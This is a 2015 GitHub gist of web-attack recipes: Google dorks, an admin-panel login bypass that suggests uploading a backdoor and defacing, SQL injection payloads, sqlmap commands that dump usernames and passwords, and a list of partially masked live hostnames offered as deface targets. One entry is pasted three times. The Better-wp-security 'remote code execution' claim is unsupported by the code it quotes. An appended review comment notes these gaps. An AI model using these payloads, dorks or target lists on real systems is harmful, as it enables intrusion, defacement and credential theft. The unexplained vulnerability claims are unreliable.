@dreadpiratesr
Created November 5, 2015 16:21

Revisions

  1. dreadpiratesr created this gist Nov 5, 2015.
    140 changes: 140 additions & 0 deletions Exploits
    @@ -0,0 +1,140 @@
    Exploit Title: Supercon Direct login to admin panel without entering password
    Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices”
    Product Description
    ——————-
    Supercon delivers high quality, reliable and cost-effective IT services to customers globally.
    We provide world-class technology services by constantly exploring and implementing innovative
    solutions that drive long-term value to our customers. We have been providing solutions to clients
    across the globe for more than 5 years and boast of our extensive
    experience on website designing and development projects.

    Vulnerability Details
    ———————
    First type the dork [inurl:/webadmin/login.php intext:“Supercon Infoservices”]
    Then after find the site in which their is written Copyright © [Version] Supercon Infoservices(P) Ltd. in the footer
    Now, go to it’s admin page http://www.targetsite.com/webadmin/login.php
    After opening the admin panel . Follow this link http://www.targetsite.com/webadmin/manage-gallery.php

    And voila you will be directly login into the admin panel and you can also upload your backdoor and deface :) .

    Exploit Title: Wordpress Better-wp-security Plugin Remote Code Execution

    Google Dork : inurl:wp-content/plugins/better-wp-security
    Location : http://site.com/wp-content/plugins/better-wp-security/better-wp-security.php
    Vulnerability is also triggered in: http://site.com/wp-content/plugins/better-wp-security/core/class-itsec-core.php
    public function admin_tooltip_ajax() {

    global $itsec_globals;

    if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce(
    sanitize_text_field( $_POST['nonce'] ), 'itsec_tooltip_nonce' ) ) {
    die ();
    }

    if ( sanitize_text_field( $_POST['module'] ) == 'close' ) {

    $data = $itsec_globals['data'];
    $data['tooltips_dismissed'] = true;
    update_site_option( 'itsec_data', $data );

    } else {

    call_user_func_array( $this->tooltip_modules[ sanitize_text_field(
    $_POST['module'] ) ]['callback'], array() );

    }

    die(); // this is required to return a proper result

    }

    Exploit Title: Property Castle CMS post SQL injection

    Google Dork: inurl:“/cms/cms.php?link_id=”
    1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+
    we will have database name
    2- we search “contact us” page
    3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
    4- we use sqlmap tool now and inject it with POST method
    EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
    #admin page: http://website/admin/index.php

    Exploit Title: Property Castle CMS post SQL injection
    Google Dork: inurl:“/cms/cms.php?link_id=”
    1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+
    we will have database name
    2- we search “contact us” page
    3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
    4- we use sqlmap tool now and inject it with POST method
    EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
    #admin page: http://website/admin/index.php

    Exploit Title: Property Castle CMS post SQL injection
    Google Dork: inurl:“/cms/cms.php?link_id=”
    1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+
    we will have database name
    2- we search “contact us” page
    3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
    4- we use sqlmap tool now and inject it with POST method
    EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
    #admin page: http://website/admin/index.php

    Exploit Title : WordPress Gallery Objects 0.4 SQL Injection
    Dork Google: inurl:/admin-ajax.php?action=go_view_object
    ######################


    Poc via Browser:

    http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html


    sqlmap:

    sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid

    ---
    Place: GET
    Parameter: viewid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
    ---


    #####################

    Polish CMS - SQL Injection
    {-} Vulnerable Versions => All Versions So Far.

    {x} Google Dork:: 1 => inurl:index.php?op=galeria id= site:pl
    {x} Google Dork:: 2 => inurl:new/index.php?op=galeria id= site:pl
    ——————————————————————————————————————————–

    File:
    index.php {HomePage}

    Vulnerable Parameters:
    [id] , [j] , [s] , [lang]

    Administration Panel:
    /admin/

    Exploit Title: PRIVATE CSR
    Google Dork : inurl:/“config/config.izo”
    # Priv8 SCR Editors
    #
    #######################################################
    # Use Editors To Edit Config Files And Deafce The Site Via CSR Editors.
    #######################################################
    #
    # [+] Example:
    #http://lom-radioX.com/config/config.izo
    #http://kesbangpolbuXlukumba.info/config/config.izo
    #http://www.mirgosXtinits.ru/config/config.izo
    #http://sacredodysXsey.com/config/config.izo
    #http://www.biohXgienica.com/config/config.izo
    #######################################################
    # [+] Deface Page: www.site.com/config/tar.tmp
    #######################################################
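Review bot: the "Property Castle CMS post SQL injection" entry is pasted three times verbatim (identical dork, numbered steps, sqlmap line and admin path each time); keep a single copy. Beyond that, no entry in this file records what a defender would need to act on it: there is no affected-version range, vendor advisory, fix version or CVE identifier anywhere. The Better-wp-security entry quotes `admin_tooltip_ajax()` in full but never says which input reaches code execution (the quoted function first rejects requests without a valid `itsec_tooltip_nonce` and then dispatches through a fixed `tooltip_modules` table, so the claim is unexplained as written); the "Polish CMS" entry gives "All Versions So Far" with no product or vendor name; and the "PRIVATE CSR" entry is only a dork plus a list of partially masked live hostnames. Suggest one header line per entry, e.g. `Affected: <product> <versions> / Fixed in: <version or unfixed> / Reference: <advisory URL>`, and dropping the hostname list, which serves no documentary purpose.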